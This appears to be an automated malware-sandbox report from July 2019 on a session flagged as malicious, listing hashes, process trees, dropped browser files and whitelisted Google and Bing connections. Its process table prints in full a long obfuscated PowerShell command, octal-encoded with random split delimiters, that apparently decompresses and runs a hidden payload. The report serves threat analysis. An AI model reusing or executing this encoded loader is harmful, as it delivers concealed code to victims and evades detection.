Field | Value |
---|---|
URL | https://www.google.com |
Full analysis | https://app.any.run/tasks/474e560c-c2c0-4627-a583-9d4c04840378 |
Verdict | Malicious activity |
Analysis date | July 17, 2019, 02:04:56 |
OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators | — |
MD5 | 8FFDEFBDEC956B595D257F0AAEEFD623 |
SHA1 | EF7EFC9839C3EE036F023E9635BC3B056D6EE2DB |
SHA256 | AC6BB669E40E44A8D9F8F0C94DFC63734049DCF6219AAC77F02EDF94B9162C09 |
SSDEEP | 3:N8DSLIK:2OLIK |
PID | CMD | Path | Indicators | Parent process | User | Company | Integrity Level | Description | Exit code | Version |
---|---|---|---|---|---|---|---|---|---|---|
3532 | "C:\Program Files\Internet Explorer\iexplore.exe" "https://www.google.com" | C:\Program Files\Internet Explorer\iexplore.exe | — | explorer.exe | admin | Microsoft Corporation | MEDIUM | Internet Explorer | 1 | 8.00.7600.16385 (win7_rtm.090713-1255) |
3964 | "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3532 CREDAT:71937 | C:\Program Files\Internet Explorer\iexplore.exe | — | iexplore.exe | admin | Microsoft Corporation | LOW | Internet Explorer | 0 | 8.00.7600.16385 (win7_rtm.090713-1255) |
4028 | "C:\Windows\system32\cmd.exe" | C:\Windows\system32\cmd.exe | — | explorer.exe | admin | Microsoft Corporation | MEDIUM | Windows Command Processor | — | 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
3276 | "C:\Windows\system32\notepad.exe" | C:\Windows\system32\notepad.exe | — | explorer.exe | admin | Microsoft Corporation | MEDIUM | Notepad | — | 6.1.7600.16385 (win7_rtm.090713-1255) |
3332 | powershell "[sTRING]::joIn( '' ,( '44G124G153%75:147p145G164,55p143,157K165S156D164G145K162~73G50K40%120%160S40<40:111<157,56S123D124S162K145:141:115D162D145,141p104p145K162S50K50:40<120p160K40:151%117,56<143G117G115S160,122D145:123%123%151<157<116D56p104,145G106K114D101S124,105K163~164K122K145S101S115S50,40~133:123<131~163:124G145p115%56K151<117:56,115<105~115D157p122S131G163%124K122~145~101p115G135G40:133p143,117~156p166<105~122K164S135<72:72K106S162%157K155:142~101D163<105%66S64~163K164<122:151~156,107S50~47,146%126p132p164S142D71S160%111~105<120p64<162~154<150~126D154K142,121S113,107<105G116D112p145p121~126%107,120S105K112:146D123S105~106p111D102,157p122G146K122S161S107~166<115K121,161S167G131%155,170D160:104<155:156D120G62,166<71K57p115p162,101S61%62D143p63,143%146<70~101D166K145p155G132<63p156K145:145%132D154K166:131S126%150S127,101S142K67%141D70<110%115S126G70G166S121D153D65,160<115G66K152S111:65:154~142D160,127<127p142,102G167S107,61D144G131,155~125%126D145K163G111,124G142K112~155:141D155~161:126K126K70,67K60~154<157D141S151%125<163K161D171~167:60G126K154K157,107,70S114D153S105<130p65p117%152D160:115G143p71G145,121~107p146p124,62p130G123:111%106D71<156D115~156<153,156K153D57<143,123G104~143<66%126%167K142%167~161<162<104<127K131,120<115K142p170<145p147:120%63S131:102p67S66G62p170,146%143D103p130:67K116:141G156<127:170:170D131p53:64%167%157<114D146p131p150D163G167S163S63S127<125<145p114D167~156<114p63,123%64K145%57p113~152D146%155D111p143D161K66S151%61~171~161G143,167~127S152p155,170K132~162%101:121p111K147<101~163:155,53G62S115K156<125D103S60G105,126~167~170,143S164K120D161G102S142D166K167G123%122S151K61<143K166K60G71G117,162S114G57G172<151K113,163<131~61:121p125<153:151p145G103:107D120K131<141S151<116,152~66D112<155:131~144G145<120p122:150,125,71G152~141S152G142<60,167G60:111%132~70G116~104S145p155<64K102<115D143,120~155D150D110~123p143p171,106%114G122G106:165D130G62%157p130,62D160D53<112S142,107D156%64K142K114D105,127D147p63D143~62~132,164K156K67%10
4:63G161:146~60:114~163p120~67K170K126K66K142D70D115:67%150%103%60S143<71G71S107<101,145p113~124,155<102<145K161G67:146S151<63,64D57K125G132D110K172G62:115~165K102,104S160~120~156,167G104p131:105S101D103G112,164%145D53<64~145K104:57K101G117~153%161G105K114:103D164:172D146,104K122D154:112:117,112<164~106~112%103p150p142<125S166S132<101S164%120p122~102<112p150,123S155p107:164S113<62S172G165G101S62S104G151p104~146K60~107G171G156D160%124%103S63K64G150G105,57~120:114:151,63K110S114<127K53:105G172D146G147~141K57~127,143:125p110p170,165G125<144K151,155G131:143S70p121<112D146p103K152K126~125K145%65G106D167D70:162%57S102D62K152S104%156,127S67%123%155<104D122<163K157:67D102,156~116:107D154~150~157,124<172:123%161<131S62,161:127~121S126~110~102,155D120p154K170p106:103%123~64:124p112<57p112G121~126p156,63p110,62<57%60:67K157,126G165%107,147%143~160~156%166p163,64S117:166D151G101:167,150:166p141~103~131:151~147:172S104%67K171~101G127G61K163<65K111:122p53<124:144p160,57p146D62~146D162D162G110G147K167,131~105<65%64S142G116S106:162p102G142p171D132~167<65:146S124,144,147<66G125<120K62<156p167p154~144,105<171S157:162G157:147S67p113<53<102D70G67,147D165~64S170G147S146K155~70D65p106,153G57~150S103:145K121D153,130K142%160S156%106G121D130~155~145p131K106p115K172:57:102S154:127K124<113S141S66<125%142p145%124%101%167~124%113,112S171G132D170p121K154%125<113%115,144%165S71S153G103D66S151G163:147,150p147p63K131K152,125~124p123S151D127,106<112K53<104~164D107:170~166K170%107D110<153,170G141D154G155G116S156:161S132K113,105p117K106p154G126S161,125,147D141:142~70%163~146<153D127K150G101~170%123,53:151K146%147~70K102p65S66K151p112S172~107<157<144~124~147:172D161%161,125%171:171<71<172<164G116~126,110%102S164K57:156:142p64K104D127%113%110,164K143~145~157K156D146K64K103K161S120G130D166%64G65S64D145p115G155G57p62G112G62G170~142%165D153,63D131%163,167G146p142~66~71~107%141G115K70%53p115p152p115:170D152,166S144K112~152K155p66D107:64G117~117,113%131D152~124S171S153K161S146K151~145D107D155G145D116,141S70p
142p120,53%110~53%101D57G141%161<122K106%102%147S67~131%66G164~141~131K172S53D156:114~161~120S67%145p152<150p121p61p61D154%104<57D145,63:101<106K60D120K62%150<147G114%116:143S112<151G61G103p130~163K147D57G115K123:61<113<141K105G71<121K115D147G110~102,116D111K71S167,132S70~167K163G115D156G127<172:143G113G122G124~122K101D116G161p102:153D172,120K112~160:107p127p164~61S165%111G130K151:116S121S153D102D141p141~71G101G132<120G123p124S113<153K150,141<127p160p143<131D153,115,157p145K105K64p157S172p113S67S146:165%126<157:105p61D146D165S117p172:151%170K63%116<53p170,57:112:123p141<142p156p126~141:161K126%125S107,114,166:110D111,64p142%166~117%65:112p172D143G152p104:144G126<121p172p161G154<65D147%147K127G114~146<113:162<123G131%110:164~107:146<163~130%57~64K166p171:132,57D160~112p126,116G112<132S162:147~127D111~110p57:160:65G61<110p132S65,150K171D166S130K116S70D123%152~116K71~64G107K101p126K132%154p172:166K123D130,153p117G123p153K166D126~141<65p102G160G112G121~151K62<71%152K65~57S147,144:66S145D124D167%113:107%166~103:60%67p165~146D141,156,151%152:67S152:116%143G63p63D112D152:131S161K171G163%143~163%166:167~164S131G116~116S142<102~126%144<61G143p113<164K125G114:104%127<170<103S162<115<110~57S130%141%171~131<114:114:127D62,113K124S122<164%66K156G67~145~65~71p106p117%154p122<101G70p71,123K101~170,142~161S53%106%156%160,145:114<61<101S114S124%124S154S160G141<53p61G123S147p104:164K165p163,116~163%67D165~60S162D162K171K104:61K125<60G121<142,161<121:101~121G57D107%117S125%171G156,141%64K153<106G70:141K155<120~64,57K106,162:106<113D65K106p106:114<71<101%144<160,124~123p111:126~57%167~127%122G156,106G66K131D104K110D61G156~164p114p111D126p144~165S156G116,150~71%114G110D132,63S170~114G71%170:121:62S62:150K65~156,171%130D164S53D125S106,172S111<131:101%143:162D163D132G151:71G126~141K101,166S63G114%112p142K102:57K154p106S172p150S63%115G160D104<131%165~152%145,71:127:151p141K157:107,110%127G147S145K165K110D112D106:171:161p143,167D102~155S154K157K147~162D153%143:111~61G157D112K66p154,125,126~
125,66~162:164G102p60<103:172p162%115G153%121K64:67~146p142K166~110~63G132<146,147<66%64D122,71%132%171:145%60D71K121~153:143,106<61p161K57,160:62<161:153~62D147~152<60<156~62G150,141p145<172<151K143G143S166G141~144%121:107<115G142p172%111:117%64,64,166p162K145K145,150G132D151G157<64K63K155<115%115p117p155p130~155:147S164K120,106G70G70,116p112p166D66K115G170p71G66~110:115S141,167K64D57<165G130%71p62G117K170p60G121p110,153~115K66G122D141%145~144:157~112p147p170G62:167K103:64,165p101D142K65G147S117:125D131:151K124S64~164D114S102K105%64p150:64<61<170D152%150G167p111G147%113S160~170%103p152,117~105G161%110G145p101G103:103<57<143%103:152~57<171D114D160K101~102K120p71<171%65,102%156%107G151,167p104,124:153G170:112S107G150:70:130~103G157D160p123D63~103p126%62,156G57:153S71G126%153~124G146K65,147,120,145:110K130G53~107G172~63~66:163G61%127~163:61<115,170%63<165S170p167S126D116,116p172S122K117%170~102p160D115,120,53,104p121S57:166,113:172:155%110K122%160p112p70,145:124%155p107p53~65S143p117<60D106S115p101S166G130D66%156<122%125<126G152%107,143S60~70:112G107<144,164:102~114,112,66K157S124G63K145G103S102S162:157<116K112D151%162%163G70<142:123D67,150<117<157S64p143G71%111S112,70:166%60~102G145~165D155K111D104%53p57:63p170K165:164S53~132~126%124p143K113:102K126K103%142S162p61D146K60~63~126%103G117<170p122S114G122,130:166%156~53<153K111,66G153D112K117K62K111:162G152,166<163~122p123G60:162<130K57:165p105<104G121<115p167p164:146:116,172K142p112S115<142p57p66:62<171p166K144,151:107G157,166~146:67:125%111D63~62<66G113K102G163<112S112D142G151<106D53G155%113D145S157%101%141<153D111%104G65G121S170%145<157G126:127K142K146K65,63D122~111S116<143p61S57S101:101K75%75D47G51D54:133:111:117<56p143,157%155S120K122~105D163p123,151<157:116K56D143:117~155S120<162,145~163:123<151p117,156K155~117p144K105,135S72p72D144%105p143~117p115%160S162:145%163~163:51S51<54%40G133~124p145%170K164<56~145D116p143<157:104p151,116,107p135:72S72p141%123<143:151:111S51:40:51<56p162%145:101%104~124p117K105,116K104,50G4
0%51S174~120G160<160'-SPLiT','-sPliT'G' -split'D'-SpLiT'%' -SpliT '<'-sPlit 'S' -split'p' -SpliT'~' -sPlIt'K' -SPliT':' |%{ ( [ConvERT]::toiNT16(( $_.TosTRiNG()) ,8)-as [CHaR])}) )" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe | admin | Microsoft Corporation | MEDIUM | Windows PowerShell | 0 | 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | MD5 | SHA256 |
---|---|---|---|---|---|
3532 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JGRR2OYX\favicon[1].ico | — | — | — |
3532 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico | — | — | — |
3964 | iexplore.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\admin@google[2].txt | — | — | — |
3964 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\SC4TYKXE\google_com[1].txt | — | — | — |
3532 | iexplore.exe | C:\Users\admin\AppData\Local\Temp\~DF2CB4A0D2E635DAA4.TMP | — | — | — |
3964 | iexplore.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\admin@google[1].txt | text | 2C6A2153A702D0D9EF708E683F00AC2B | 08E3917BA5BDBBABFF286BF23B0B0D3561CE00D7B5ACF06D0ECF258C9A6461C6 |
3532 | iexplore.exe | C:\Users\admin\AppData\Local\Temp\~DF79CD5BB1BA16C293.TMP | — | — | — |
3964 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\index.dat | dat | D47ABEB13D96D4CBB1AEE9D993F41DB5 | 1B07282E9B5E0CF6837C4812A87A87DA196E44AAC21BA7DC08210B25A09ED38C |
3964 | iexplore.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\index.dat | dat | 2183561AF5C0D31DE463804D59CBD190 | 8B289F305BCB89B441BDE9FFAC5033FE8DB71A85302187944F110145DBAEDF02 |
3964 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\LLJ0WZ3G\rs=ACT90oG2W-B0YVS9JDpKMf972pB-6du_HA[1] | text | 203B100FBE1C51A960E2804DA0B01D36 | DE22A17DA12FCB0F9021794AB56F578657911D44ACAD2E8E4AC3061B24C5F6D5 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3532 | iexplore.exe | GET | 200 | 204.79.197.200:80 | http://www.bing.com/favicon.ico | US | image | 237 B | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3964 | iexplore.exe | 172.217.18.100:443 | www.google.com | Google Inc. | US | whitelisted |
3532 | iexplore.exe | 172.217.18.100:443 | www.google.com | Google Inc. | US | whitelisted |
3532 | iexplore.exe | 204.79.197.200:80 | www.bing.com | Microsoft Corporation | US | whitelisted |
Domain | IP | Reputation |
---|---|---|
www.google.com | — | whitelisted |
www.bing.com | — | whitelisted |